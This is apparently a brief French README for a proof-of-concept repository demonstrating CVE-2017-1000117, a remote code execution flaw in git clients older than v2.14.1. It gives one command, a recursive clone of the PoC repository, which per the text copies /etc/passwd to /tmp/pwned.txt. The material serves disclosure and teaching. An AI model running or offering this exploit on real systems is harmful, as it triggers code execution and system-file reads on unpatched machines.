
Exploit de preuve de concept pour CVE-2017-1000117, une vulnérabilité d'exécution de code à distance dans les clients git antérieurs à v2.14.1, démontrant l'exploitation de clone récursif à des fins éducatives.
Dépôt GIT de test pour le PoC git-client-rce ( CVE-2017-1000117 )
https://marc.info/?l=git&m=150238802328673&w=2
Cette CVE affecte tous les clients git < v2.14.1
Exécutez la commande suivante sur le système de test pour voir le PoC :
$git clone --recursive https://github.com/thelastbyte/CVE-2017-1000117.git
Une exécution réussie entraînera la copie du contenu de /etc/passwd vers /tmp/pwned.txt